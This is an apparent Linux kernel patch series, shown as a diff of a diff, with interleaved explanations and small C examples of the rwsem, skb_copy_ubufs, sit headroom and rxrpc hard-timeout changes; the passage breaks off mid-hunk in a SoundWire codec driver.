+@@ -1269,17 +1269,17 @@ out:
+ 	return ret;
+ }
+ 
+-static inline void __down_read(struct rw_semaphore *sem)
++static __always_inline void __down_read(struct rw_semaphore *sem)
+ {
+ 	__down_read_common(sem, TASK_UNINTERRUPTIBLE);
+ }
+ 
+-static inline int __down_read_interruptible(struct rw_semaphore *sem)
++static __always_inline int __down_read_interruptible(struct rw_semaphore *sem)
+ {
+ 	return __down_read_common(sem, TASK_INTERRUPTIBLE);
+ }
+ 
+-static inline int __down_read_killable(struct rw_semaphore *sem)
++static __always_inline int __down_read_killable(struct rw_semaphore *sem)
+ {
+ 	return __down_read_common(sem, TASK_KILLABLE);
+ }
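
In kernel code `inline` is only a hint; the rwsem hunk promotes the down_read fast paths to `__always_inline` so the compiler cannot outline them. The upstream motivation, summarized loosely here, is that an outlined __down_read_common() becomes the reported blocking point for every contended reader, hiding which caller actually blocked. The two annotations side by side, with __always_inline spelled out as the GCC/Clang attribute it expands to:

	/* userspace stand-in for the kernel macro */
	#define __always_inline	inline __attribute__((__always_inline__))

	static inline int hinted(int x)			/* the compiler may still outline this */
	{
		return x + 1;
	}

	static __always_inline int forced(int x)	/* inlined, or a hard compile error */
	{
		return x + 1;
	}

	int main(void)
	{
		return hinted(1) + forced(2) - 5;	/* exit status 0 */
	}
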
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 6f5ef18a8b772..ef3dd8f120e02 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -1608,7 +1608,7 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ {
+ 	int num_frags = skb_shinfo(skb)->nr_frags;
+ 	struct page *page, *head = NULL;
+-	int i, new_frags;
++	int i, order, psize, new_frags;
+ 	u32 d_off;
+ 
+ 	if (skb_shared(skb) || skb_unclone(skb, gfp_mask))
+@@ -1617,9 +1617,17 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 	if (!num_frags)
+ 		goto release;
+ 
+-	new_frags = (__skb_pagelen(skb) + PAGE_SIZE - 1) >> PAGE_SHIFT;
++	/* We might have to allocate high order pages, so compute what minimum
++	 * page order is needed.
++	 */
++	order = 0;
++	while ((PAGE_SIZE << order) * MAX_SKB_FRAGS < __skb_pagelen(skb))
++		order++;
++	psize = (PAGE_SIZE << order);
++
++	new_frags = (__skb_pagelen(skb) + psize - 1) >> (PAGE_SHIFT + order);
+ 	for (i = 0; i < new_frags; i++) {
+-		page = alloc_page(gfp_mask);
++		page = alloc_pages(gfp_mask | __GFP_COMP, order);
+ 		if (!page) {
+ 			while (head) {
+ 				struct page *next = (struct page *)page_private(head);
+@@ -1646,11 +1654,11 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 			vaddr = kmap_atomic(p);
+ 
+ 			while (done < p_len) {
+-				if (d_off == PAGE_SIZE) {
++				if (d_off == psize) {
+ 					d_off = 0;
+ 					page = (struct page *)page_private(page);
+ 				}
+-				copy = min_t(u32, PAGE_SIZE - d_off, p_len - done);
++				copy = min_t(u32, psize - d_off, p_len - done);
+ 				memcpy(page_address(page) + d_off,
+ 				       vaddr + p_off + done, copy);
+ 				done += copy;
+@@ -1666,7 +1674,7 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 
+ 	/* skb frags point to kernel buffers */
+ 	for (i = 0; i < new_frags - 1; i++) {
+-		__skb_fill_page_desc(skb, i, head, 0, PAGE_SIZE);
++		__skb_fill_page_desc(skb, i, head, 0, psize);
+ 		head = (struct page *)page_private(head);
+ 	}
+ 	__skb_fill_page_desc(skb, new_frags - 1, head, 0, d_off);
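
The skb_copy_ubufs() fix handles SKBs whose paged data cannot fit in MAX_SKB_FRAGS order-0 pages: it raises the allocation order until MAX_SKB_FRAGS pages of size PAGE_SIZE << order cover the payload, then sizes the copy and fill arithmetic by psize instead of PAGE_SIZE. The order search in isolation, standalone and with illustrative constants:

	#include <stdio.h>

	#define PAGE_SHIFT	12
	#define PAGE_SIZE	(1UL << PAGE_SHIFT)
	#define MAX_SKB_FRAGS	17	/* typical value; config-dependent in the kernel */

	int main(void)
	{
		unsigned long pagelen = 96 * 1024;	/* stand-in for __skb_pagelen(skb) */
		int order = 0;

		/* smallest order such that MAX_SKB_FRAGS pages cover the payload */
		while ((PAGE_SIZE << order) * MAX_SKB_FRAGS < pagelen)
			order++;

		unsigned long psize = PAGE_SIZE << order;
		unsigned long new_frags = (pagelen + psize - 1) >> (PAGE_SHIFT + order);

		/* prints order=1 psize=8192 new_frags=12 for these numbers */
		printf("order=%d psize=%lu new_frags=%lu\n", order, psize, new_frags);
		return 0;
	}
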
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index 646b3e490c71a..f0c646a17700f 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -573,8 +573,8 @@ static int ethtool_get_link_ksettings(struct net_device *dev,
+ static int ethtool_set_link_ksettings(struct net_device *dev,
+ 				      void __user *useraddr)
+ {
++	struct ethtool_link_ksettings link_ksettings = {};
+ 	int err;
+-	struct ethtool_link_ksettings link_ksettings;
+ 
+ 	ASSERT_RTNL();
+ 
+diff --git a/net/ipv6/sit.c b/net/ipv6/sit.c
+index 70d81bba50939..3ffb6a5b1f82a 100644
+--- a/net/ipv6/sit.c
++++ b/net/ipv6/sit.c
+@@ -1095,12 +1095,13 @@ tx_err:
+ 
+ static void ipip6_tunnel_bind_dev(struct net_device *dev)
+ {
++	struct ip_tunnel *tunnel = netdev_priv(dev);
++	int t_hlen = tunnel->hlen + sizeof(struct iphdr);
+ 	struct net_device *tdev = NULL;
+-	struct ip_tunnel *tunnel;
++	int hlen = LL_MAX_HEADER;
+ 	const struct iphdr *iph;
+ 	struct flowi4 fl4;
+ 
+-	tunnel = netdev_priv(dev);
+ 	iph = &tunnel->parms.iph;
+ 
+ 	if (iph->daddr) {
+@@ -1123,14 +1124,15 @@ static void ipip6_tunnel_bind_dev(struct net_device *dev)
+ 		tdev = __dev_get_by_index(tunnel->net, tunnel->parms.link);
+ 
+ 	if (tdev && !netif_is_l3_master(tdev)) {
+-		int t_hlen = tunnel->hlen + sizeof(struct iphdr);
+ 		int mtu;
+ 
+ 		mtu = tdev->mtu - t_hlen;
+ 		if (mtu < IPV6_MIN_MTU)
+ 			mtu = IPV6_MIN_MTU;
+ 		WRITE_ONCE(dev->mtu, mtu);
++		hlen = tdev->hard_header_len + tdev->needed_headroom;
+ 	}
++	dev->needed_headroom = t_hlen + hlen;
+ }
+ 
+ static void ipip6_tunnel_update(struct ip_tunnel *t, struct ip_tunnel_parm *p,
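
The sit change computes the tunnel's own header cost (t_hlen = tunnel->hlen + sizeof(struct iphdr)) up front and reserves needed_headroom as that cost plus whatever the underlying device itself needs, falling back to LL_MAX_HEADER when no lower device is bound; reserving it here spares the transmit path a per-packet headroom reallocation. The arithmetic with illustrative numbers:

	#include <stdio.h>

	int main(void)
	{
		int iphdr_len = 20;		/* sizeof(struct iphdr) */
		int t_hlen = 0 + iphdr_len;	/* tunnel->hlen + outer IPv4 header */
		int lower = 14 + 0;		/* tdev->hard_header_len + tdev->needed_headroom
						 * for a plain Ethernet lower device */

		printf("needed_headroom = %d\n", t_hlen + lower);	/* 34 */
		return 0;
	}
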
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index e4da7267ed4bd..e0706c33e5472 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1064,7 +1064,7 @@ static void tcp_v6_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 			if (np->repflow)
+ 				label = ip6_flowlabel(ipv6h);
+ 			priority = sk->sk_priority;
+-			txhash = sk->sk_hash;
++			txhash = sk->sk_txhash;
+ 		}
+ 		if (sk->sk_state == TCP_TIME_WAIT) {
+ 			label = cpu_to_be32(inet_twsk(sk)->tw_flowlabel);
+diff --git a/net/ncsi/ncsi-aen.c b/net/ncsi/ncsi-aen.c
+index b635c194f0a85..62fb1031763d1 100644
+--- a/net/ncsi/ncsi-aen.c
++++ b/net/ncsi/ncsi-aen.c
+@@ -165,6 +165,7 @@ static int ncsi_aen_handler_cr(struct ncsi_dev_priv *ndp,
+ 	nc->state = NCSI_CHANNEL_INACTIVE;
+ 	list_add_tail_rcu(&nc->link, &ndp->channel_queue);
+ 	spin_unlock_irqrestore(&ndp->lock, flags);
++	nc->modes[NCSI_MODE_TX_ENABLE].enable = 0;
+ 
+ 	return ncsi_process_next_channel(ndp);
+ }
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 96bc4b8ded423..d64478af0129f 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -1951,7 +1951,8 @@ static struct nft_hook *nft_hook_list_find(struct list_head *hook_list,
+ 
+ static int nf_tables_parse_netdev_hooks(struct net *net,
+ 					const struct nlattr *attr,
+-					struct list_head *hook_list)
++					struct list_head *hook_list,
++					struct netlink_ext_ack *extack)
+ {
+ 	struct nft_hook *hook, *next;
+ 	const struct nlattr *tmp;
+@@ -1965,10 +1966,12 @@ static int nf_tables_parse_netdev_hooks(struct net *net,
+ 
+ 		hook = nft_netdev_hook_alloc(net, tmp);
+ 		if (IS_ERR(hook)) {
++			NL_SET_BAD_ATTR(extack, tmp);
+ 			err = PTR_ERR(hook);
+ 			goto err_hook;
+ 		}
+ 		if (nft_hook_list_find(hook_list, hook)) {
++			NL_SET_BAD_ATTR(extack, tmp);
+ 			kfree(hook);
+ 			err = -EEXIST;
+ 			goto err_hook;
+@@ -2001,20 +2004,23 @@ struct nft_chain_hook {
+ 
+ static int nft_chain_parse_netdev(struct net *net,
+ 				  struct nlattr *tb[],
+-				  struct list_head *hook_list)
++				  struct list_head *hook_list,
++				  struct netlink_ext_ack *extack)
+ {
+ 	struct nft_hook *hook;
+ 	int err;
+ 
+ 	if (tb[NFTA_HOOK_DEV]) {
+ 		hook = nft_netdev_hook_alloc(net, tb[NFTA_HOOK_DEV]);
+-		if (IS_ERR(hook))
++		if (IS_ERR(hook)) {
++			NL_SET_BAD_ATTR(extack, tb[NFTA_HOOK_DEV]);
+ 			return PTR_ERR(hook);
++		}
+ 
+ 		list_add_tail(&hook->list, hook_list);
+ 	} else if (tb[NFTA_HOOK_DEVS]) {
+ 		err = nf_tables_parse_netdev_hooks(net, tb[NFTA_HOOK_DEVS],
+-						   hook_list);
++						   hook_list, extack);
+ 		if (err < 0)
+ 			return err;
+ 
+@@ -2047,8 +2053,10 @@ static int nft_chain_parse_hook(struct net *net,
+ 		return err;
+ 
+ 	if (ha[NFTA_HOOK_HOOKNUM] == NULL ||
+-	    ha[NFTA_HOOK_PRIORITY] == NULL)
+-		return -EINVAL;
++	    ha[NFTA_HOOK_PRIORITY] == NULL) {
++		NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_NAME]);
++		return -ENOENT;
++	}
+ 
+ 	hook->num = ntohl(nla_get_be32(ha[NFTA_HOOK_HOOKNUM]));
+ 	hook->priority = ntohl(nla_get_be32(ha[NFTA_HOOK_PRIORITY]));
+@@ -2082,7 +2090,7 @@ static int nft_chain_parse_hook(struct net *net,
+ 
+ 	INIT_LIST_HEAD(&hook->list);
+ 	if (nft_base_chain_netdev(family, hook->num)) {
+-		err = nft_chain_parse_netdev(net, ha, &hook->list);
++		err = nft_chain_parse_netdev(net, ha, &hook->list, extack);
+ 		if (err < 0) {
+ 			module_put(type->owner);
+ 			return err;
+@@ -7550,9 +7558,10 @@ static const struct nla_policy nft_flowtable_hook_policy[NFTA_FLOWTABLE_HOOK_MAX
+ };
+ 
+ static int nft_flowtable_parse_hook(const struct nft_ctx *ctx,
+-				    const struct nlattr *attr,
++				    const struct nlattr * const nla[],
+ 				    struct nft_flowtable_hook *flowtable_hook,
+-				    struct nft_flowtable *flowtable, bool add)
++				    struct nft_flowtable *flowtable,
++				    struct netlink_ext_ack *extack, bool add)
+ {
+ 	struct nlattr *tb[NFTA_FLOWTABLE_HOOK_MAX + 1];
+ 	struct nft_hook *hook;
+@@ -7561,15 +7570,18 @@ static int nft_flowtable_parse_hook(const struct nft_ctx *ctx,
+ 
+ 	INIT_LIST_HEAD(&flowtable_hook->list);
+ 
+-	err = nla_parse_nested_deprecated(tb, NFTA_FLOWTABLE_HOOK_MAX, attr,
++	err = nla_parse_nested_deprecated(tb, NFTA_FLOWTABLE_HOOK_MAX,
++					  nla[NFTA_FLOWTABLE_HOOK],
+ 					  nft_flowtable_hook_policy, NULL);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	if (add) {
+ 		if (!tb[NFTA_FLOWTABLE_HOOK_NUM] ||
+-		    !tb[NFTA_FLOWTABLE_HOOK_PRIORITY])
+-			return -EINVAL;
++		    !tb[NFTA_FLOWTABLE_HOOK_PRIORITY]) {
++			NL_SET_BAD_ATTR(extack, nla[NFTA_FLOWTABLE_NAME]);
++			return -ENOENT;
++		}
+ 
+ 		hooknum = ntohl(nla_get_be32(tb[NFTA_FLOWTABLE_HOOK_NUM]));
+ 		if (hooknum != NF_NETDEV_INGRESS)
+@@ -7599,7 +7611,8 @@ static int nft_flowtable_parse_hook(const struct nft_ctx *ctx,
+ 	if (tb[NFTA_FLOWTABLE_HOOK_DEVS]) {
+ 		err = nf_tables_parse_netdev_hooks(ctx->net,
+ 						   tb[NFTA_FLOWTABLE_HOOK_DEVS],
+-						   &flowtable_hook->list);
++						   &flowtable_hook->list,
++						   extack);
+ 		if (err < 0)
+ 			return err;
+ 	}
+@@ -7731,7 +7744,7 @@ err_unregister_net_hooks:
+ 	return err;
+ }
+ 
+-static void nft_flowtable_hooks_destroy(struct list_head *hook_list)
++static void nft_hooks_destroy(struct list_head *hook_list)
+ {
+ 	struct nft_hook *hook, *next;
+ 
+@@ -7742,7 +7755,8 @@ static void nft_flowtable_hooks_destroy(struct list_head *hook_list)
+ }
+ 
+ static int nft_flowtable_update(struct nft_ctx *ctx, const struct nlmsghdr *nlh,
+-				struct nft_flowtable *flowtable)
++				struct nft_flowtable *flowtable,
++				struct netlink_ext_ack *extack)
+ {
+ 	const struct nlattr * const *nla = ctx->nla;
+ 	struct nft_flowtable_hook flowtable_hook;
+@@ -7752,8 +7766,8 @@ static int nft_flowtable_update(struct nft_ctx *ctx, const struct nlmsghdr *nlh,
+ 	u32 flags;
+ 	int err;
+ 
+-	err = nft_flowtable_parse_hook(ctx, nla[NFTA_FLOWTABLE_HOOK],
+-				       &flowtable_hook, flowtable, false);
++	err = nft_flowtable_parse_hook(ctx, nla, &flowtable_hook, flowtable,
++				       extack, false);
+ 	if (err < 0)
+ 		return err;
+ 
+@@ -7858,7 +7872,7 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 
+ 		nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
+-		return nft_flowtable_update(&ctx, info->nlh, flowtable);
++		return nft_flowtable_update(&ctx, info->nlh, flowtable, extack);
+ 	}
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+@@ -7898,8 +7912,8 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 	if (err < 0)
+ 		goto err3;
+ 
+-	err = nft_flowtable_parse_hook(&ctx, nla[NFTA_FLOWTABLE_HOOK],
+-				       &flowtable_hook, flowtable, true);
++	err = nft_flowtable_parse_hook(&ctx, nla, &flowtable_hook, flowtable,
++				       extack, true);
+ 	if (err < 0)
+ 		goto err4;
+ 
+@@ -7911,7 +7925,7 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 					       &flowtable->hook_list,
+ 					       flowtable);
+ 	if (err < 0) {
+-		nft_flowtable_hooks_destroy(&flowtable->hook_list);
++		nft_hooks_destroy(&flowtable->hook_list);
+ 		goto err4;
+ 	}
+ 
+@@ -7951,7 +7965,8 @@ static void nft_flowtable_hook_release(struct nft_flowtable_hook *flowtable_hook
+ }
+ 
+ static int nft_delflowtable_hook(struct nft_ctx *ctx,
+-				 struct nft_flowtable *flowtable)
++				 struct nft_flowtable *flowtable,
++				 struct netlink_ext_ack *extack)
+ {
+ 	const struct nlattr * const *nla = ctx->nla;
+ 	struct nft_flowtable_hook flowtable_hook;
+@@ -7960,8 +7975,8 @@ static int nft_delflowtable_hook(struct nft_ctx *ctx,
+ 	struct nft_trans *trans;
+ 	int err;
+ 
+-	err = nft_flowtable_parse_hook(ctx, nla[NFTA_FLOWTABLE_HOOK],
+-				       &flowtable_hook, flowtable, false);
++	err = nft_flowtable_parse_hook(ctx, nla, &flowtable_hook, flowtable,
++				       extack, false);
+ 	if (err < 0)
+ 		return err;
+ 
+@@ -8039,7 +8054,7 @@ static int nf_tables_delflowtable(struct sk_buff *skb,
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
+ 	if (nla[NFTA_FLOWTABLE_HOOK])
+-		return nft_delflowtable_hook(&ctx, flowtable);
++		return nft_delflowtable_hook(&ctx, flowtable, extack);
+ 
+ 	if (flowtable->use > 0) {
+ 		NL_SET_BAD_ATTR(extack, attr);
+@@ -8685,7 +8700,7 @@ static void nft_commit_release(struct nft_trans *trans)
+ 		break;
+ 	case NFT_MSG_DELFLOWTABLE:
+ 		if (nft_trans_flowtable_update(trans))
+-			nft_flowtable_hooks_destroy(&nft_trans_flowtable_hooks(trans));
++			nft_hooks_destroy(&nft_trans_flowtable_hooks(trans));
+ 		else
+ 			nf_tables_flowtable_destroy(nft_trans_flowtable(trans));
+ 		break;
+@@ -9331,7 +9346,7 @@ static void nf_tables_abort_release(struct nft_trans *trans)
+ 		break;
+ 	case NFT_MSG_NEWFLOWTABLE:
+ 		if (nft_trans_flowtable_update(trans))
+-			nft_flowtable_hooks_destroy(&nft_trans_flowtable_hooks(trans));
++			nft_hooks_destroy(&nft_trans_flowtable_hooks(trans));
+ 		else
+ 			nf_tables_flowtable_destroy(nft_trans_flowtable(trans));
+ 		break;
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 1259b34a28ebe..cc7a42ba94f93 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -2036,7 +2036,7 @@ retry:
+ 		goto retry;
+ 	}
+ 
+-	if (!dev_validate_header(dev, skb->data, len)) {
++	if (!dev_validate_header(dev, skb->data, len) || !skb->len) {
+ 		err = -EINVAL;
+ 		goto out_unlock;
+ 	}
+diff --git a/net/rxrpc/af_rxrpc.c b/net/rxrpc/af_rxrpc.c
+index ebbd4a1c3f86e..de5bebc99a4b5 100644
+--- a/net/rxrpc/af_rxrpc.c
++++ b/net/rxrpc/af_rxrpc.c
+@@ -265,6 +265,7 @@ static int rxrpc_listen(struct socket *sock, int backlog)
+  * @key: The security context to use (defaults to socket setting)
+  * @user_call_ID: The ID to use
+  * @tx_total_len: Total length of data to transmit during the call (or -1)
++ * @hard_timeout: The maximum lifespan of the call in sec
+  * @gfp: The allocation constraints
+  * @notify_rx: Where to send notifications instead of socket queue
+  * @upgrade: Request service upgrade for call
+@@ -283,6 +284,7 @@ struct rxrpc_call *rxrpc_kernel_begin_call(struct socket *sock,
+ 					   struct key *key,
+ 					   unsigned long user_call_ID,
+ 					   s64 tx_total_len,
++					   u32 hard_timeout,
+ 					   gfp_t gfp,
+ 					   rxrpc_notify_rx_t notify_rx,
+ 					   bool upgrade,
+@@ -313,6 +315,7 @@ struct rxrpc_call *rxrpc_kernel_begin_call(struct socket *sock,
+ 	p.tx_total_len		= tx_total_len;
+ 	p.interruptibility	= interruptibility;
+ 	p.kernel		= true;
++	p.timeouts.hard		= hard_timeout;
+ 
+ 	memset(&cp, 0, sizeof(cp));
+ 	cp.local		= rx->local;
+diff --git a/net/rxrpc/ar-internal.h b/net/rxrpc/ar-internal.h
+index 433060cade038..ed0ef2dbd592b 100644
+--- a/net/rxrpc/ar-internal.h
++++ b/net/rxrpc/ar-internal.h
+@@ -614,6 +614,7 @@ struct rxrpc_call {
+ 	unsigned long		expect_term_by;	/* When we expect call termination by */
+ 	u32			next_rx_timo;	/* Timeout for next Rx packet (jif) */
+ 	u32			next_req_timo;	/* Timeout for next Rx request packet (jif) */
++	u32			hard_timo;	/* Maximum lifetime or 0 (jif) */
+ 	struct timer_list	timer;		/* Combined event timer */
+ 	struct work_struct	destroyer;	/* In-process-context destroyer */
+ 	rxrpc_notify_rx_t	notify_rx;	/* kernel service Rx notification function */
+diff --git a/net/rxrpc/call_object.c b/net/rxrpc/call_object.c
+index 7ce562f6dc8d5..80ed67f4f3a7d 100644
+--- a/net/rxrpc/call_object.c
++++ b/net/rxrpc/call_object.c
+@@ -225,6 +225,13 @@ static struct rxrpc_call *rxrpc_alloc_client_call(struct rxrpc_sock *rx,
+ 	if (cp->exclusive)
+ 		__set_bit(RXRPC_CALL_EXCLUSIVE, &call->flags);
+ 
++	if (p->timeouts.normal)
++		call->next_rx_timo = min(msecs_to_jiffies(p->timeouts.normal), 1UL);
++	if (p->timeouts.idle)
++		call->next_req_timo = min(msecs_to_jiffies(p->timeouts.idle), 1UL);
++	if (p->timeouts.hard)
++		call->hard_timo = p->timeouts.hard * HZ;
++
+ 	ret = rxrpc_init_client_call_security(call);
+ 	if (ret < 0) {
+ 		rxrpc_prefail_call(call, RXRPC_CALL_LOCAL_ERROR, ret);
+@@ -256,7 +263,7 @@ void rxrpc_start_call_timer(struct rxrpc_call *call)
+ 	call->keepalive_at = j;
+ 	call->expect_rx_by = j;
+ 	call->expect_req_by = j;
+-	call->expect_term_by = j;
++	call->expect_term_by = j + call->hard_timo;
+ 	call->timer.expires = now;
+ }
+ 
+diff --git a/net/rxrpc/sendmsg.c b/net/rxrpc/sendmsg.c
+index da49fcf1c4567..8e0b94714e849 100644
+--- a/net/rxrpc/sendmsg.c
++++ b/net/rxrpc/sendmsg.c
+@@ -50,15 +50,11 @@ static int rxrpc_wait_to_be_connected(struct rxrpc_call *call, long *timeo)
+ 	_enter("%d", call->debug_id);
+ 
+ 	if (rxrpc_call_state(call) != RXRPC_CALL_CLIENT_AWAIT_CONN)
+-		return call->error;
++		goto no_wait;
+ 
+ 	add_wait_queue_exclusive(&call->waitq, &myself);
+ 
+ 	for (;;) {
+-		ret = call->error;
+-		if (ret < 0)
+-			break;
+-
+ 		switch (call->interruptibility) {
+ 		case RXRPC_INTERRUPTIBLE:
+ 		case RXRPC_PREINTERRUPTIBLE:
+@@ -69,10 +65,9 @@ static int rxrpc_wait_to_be_connected(struct rxrpc_call *call, long *timeo)
+ 			set_current_state(TASK_UNINTERRUPTIBLE);
+ 			break;
+ 		}
+-		if (rxrpc_call_state(call) != RXRPC_CALL_CLIENT_AWAIT_CONN) {
+-			ret = call->error;
++
++		if (rxrpc_call_state(call) != RXRPC_CALL_CLIENT_AWAIT_CONN)
+ 			break;
+-		}
+ 		if ((call->interruptibility == RXRPC_INTERRUPTIBLE ||
+ 		     call->interruptibility == RXRPC_PREINTERRUPTIBLE) &&
+ 		    signal_pending(current)) {
+@@ -85,6 +80,7 @@ static int rxrpc_wait_to_be_connected(struct rxrpc_call *call, long *timeo)
+ 	remove_wait_queue(&call->waitq, &myself);
+ 	__set_current_state(TASK_RUNNING);
+ 
++no_wait:
+ 	if (ret == 0 && rxrpc_call_is_complete(call))
+ 		ret = call->error;
+ 
+@@ -655,15 +651,19 @@ int rxrpc_do_sendmsg(struct rxrpc_sock *rx, struct msghdr *msg, size_t len)
+ 		if (IS_ERR(call))
+ 			return PTR_ERR(call);
+ 		/* ... and we have the call lock. */
++		p.call.nr_timeouts = 0;
+ 		ret = 0;
+ 		if (rxrpc_call_is_complete(call))
+ 			goto out_put_unlock;
+ 	} else {
+ 		switch (rxrpc_call_state(call)) {
+-		case RXRPC_CALL_UNINITIALISED:
+ 		case RXRPC_CALL_CLIENT_AWAIT_CONN:
+-		case RXRPC_CALL_SERVER_PREALLOC:
+ 		case RXRPC_CALL_SERVER_SECURING:
++			if (p.command == RXRPC_CMD_SEND_ABORT)
++				break;
++			fallthrough;
++		case RXRPC_CALL_UNINITIALISED:
++		case RXRPC_CALL_SERVER_PREALLOC:
+ 			rxrpc_put_call(call, rxrpc_call_put_sendmsg);
+ 			ret = -EBUSY;
+ 			goto error_release_sock;
+@@ -703,7 +703,7 @@ int rxrpc_do_sendmsg(struct rxrpc_sock *rx, struct msghdr *msg, size_t len)
+ 		fallthrough;
+ 	case 1:
+ 		if (p.call.timeouts.hard > 0) {
+-			j = msecs_to_jiffies(p.call.timeouts.hard);
++			j = p.call.timeouts.hard * HZ;
+ 			now = jiffies;
+ 			j += now;
+ 			WRITE_ONCE(call->expect_term_by, j);
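
The rxrpc changes thread a hard timeout through rxrpc_kernel_begin_call(): the caller supplies whole seconds, rxrpc_alloc_client_call() converts that to jiffies with `* HZ` into the new hard_timo field, and rxrpc_start_call_timer() arms expect_term_by at now plus hard_timo (a zero timeout preserves the old behaviour). The sendmsg path above was switched from msecs_to_jiffies() to the same seconds-based conversion so both entry points agree on units. The conversion in isolation; the HZ value below is illustrative, standing in for CONFIG_HZ:

	#include <stdio.h>

	#define HZ	250			/* illustrative; CONFIG_HZ in a real kernel */

	int main(void)
	{
		unsigned int hard_timeout = 30;			/* seconds, from the caller */
		unsigned long hard_timo = hard_timeout * HZ;	/* 7500 jiffies */
		unsigned long j = 123456;			/* pretend current jiffies */

		printf("expect_term_by = %lu\n", j + hard_timo);
		return 0;
	}
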
+diff --git a/net/sched/act_mirred.c b/net/sched/act_mirred.c
+index 8037ec9b1d311..a61482c5edbe7 100644
+--- a/net/sched/act_mirred.c
++++ b/net/sched/act_mirred.c
+@@ -264,7 +264,7 @@ TC_INDIRECT_SCOPE int tcf_mirred_act(struct sk_buff *skb,
+ 		goto out;
+ 	}
+ 
+-	if (unlikely(!(dev->flags & IFF_UP))) {
++	if (unlikely(!(dev->flags & IFF_UP)) || !netif_carrier_ok(dev)) {
+ 		net_notice_ratelimited("tc mirred to Houston: device %s is down\n",
+ 				       dev->name);
+ 		goto out;
+diff --git a/net/sched/cls_api.c b/net/sched/cls_api.c
+index 668130f089034..3f37e9c10af4d 100644
+--- a/net/sched/cls_api.c
++++ b/net/sched/cls_api.c
+@@ -1484,6 +1484,7 @@ static int tcf_block_bind(struct tcf_block *block,
+ 
+ err_unroll:
+ 	list_for_each_entry_safe(block_cb, next, &bo->cb_list, list) {
++		list_del(&block_cb->driver_list);
+ 		if (i-- > 0) {
+ 			list_del(&block_cb->list);
+ 			tcf_block_playback_offloads(block, block_cb->cb,
+diff --git a/sound/soc/codecs/rt1316-sdw.c b/sound/soc/codecs/rt1316-sdw.c
+index e6294cc7a9954..45a3eff31915b 100644
+--- a/sound/soc/codecs/rt1316-sdw.c
++++ b/sound/soc/codecs/rt1316-sdw.c
+@@ -584,7 +584,7 @@ static int rt1316_sdw_pcm_hw_free(struct snd_pcm_substream *substream,
+  * slave_ops: callbacks for get_clock_stop_mode, clock_stop and
+  * port_prep are not defined for now
+  */
+-static struct sdw_slave_ops rt1316_slave_ops = {
++static const struct sdw_slave_ops rt1316_slave_ops = {
+ 	.read_prop = rt1316_read_prop,
+ 	.update_status = rt1316_update_status,
+ };
+diff --git a/sound/soc/codecs/rt1318-sdw.c b/sound/soc/codecs/rt1318-sdw.c
+index f85f5ab2c6d04..c6ec86e97a6e7 100644
+--- a/sound/soc/codecs/rt1318-sdw.c
++++ b/sound/soc/codecs/rt1318-sdw.c
+@@ -697,7 +697,7 @@ static int rt1318_sdw_pcm_hw_free(struct snd_pcm_substream *substream,
+  * slave_ops: callbacks for get_clock_stop_mode, clock_stop and
+  * port_prep are not defined for now
+  */
+-static struct sdw_slave_ops rt1318_slave_ops = {
++static const struct sdw_slave_ops rt1318_slave_ops = {
+ 	.read_prop = rt1318_read_prop,
+ 	.update_status = rt1318_update_status,
+ };
+diff --git a/sound/soc/codecs/rt711-sdca-sdw.c b/sound/soc/codecs/rt711-sdca-sdw.c
+index 88a8392a58edb..e23cec4c457de 100644
+--- a/sound/soc/codecs/rt711-sdca-sdw.c
++++ b/sound/soc/codecs/rt711-sdca-sdw.c
+@@ -338,7 +338,7 @@ io_error:
+ 	return ret;
+ }
+ 
+-static struct sdw_slave_ops rt711_sdca_slave_ops = {
++static const struct sdw_slave_ops rt711_sdca_slave_ops = {
+ 	.read_prop = rt711_sdca_read_prop,
+ 	.interrupt_callback = rt711_sdca_interrupt_callback,
+ 	.update_status = rt711_sdca_update_status,
+diff --git a/sound/soc/codecs/rt715-sdca-sdw.c b/sound/soc/codecs/rt715-sdca-sdw.c
+index c54ecf3e69879..38a82e4e2f952 100644
+--- a/sound/soc/codecs/rt715-sdca-sdw.c
++++ b/sound/soc/codecs/rt715-sdca-sdw.c
+@@ -172,7 +172,7 @@ static int rt715_sdca_read_prop(struct sdw_slave *slave)
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops rt715_sdca_slave_ops = {
++static const struct sdw_slave_ops rt715_sdca_slave_ops = {
+ 	.read_prop = rt715_sdca_read_prop,
+ 	.update_status = rt715_sdca_update_status,
+ };
+diff --git a/sound/soc/codecs/wcd938x-sdw.c b/sound/soc/codecs/wcd938x-sdw.c
+index 1bf3c06a2b622..402286dfaea44 100644
+--- a/sound/soc/codecs/wcd938x-sdw.c
++++ b/sound/soc/codecs/wcd938x-sdw.c
+@@ -161,6 +161,14 @@ EXPORT_SYMBOL_GPL(wcd938x_sdw_set_sdw_stream);
+ static int wcd9380_update_status(struct sdw_slave *slave,
+ 				 enum sdw_slave_status status)
+ {
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(&slave->dev);
++
++	if (wcd->regmap && (status == SDW_SLAVE_ATTACHED)) {
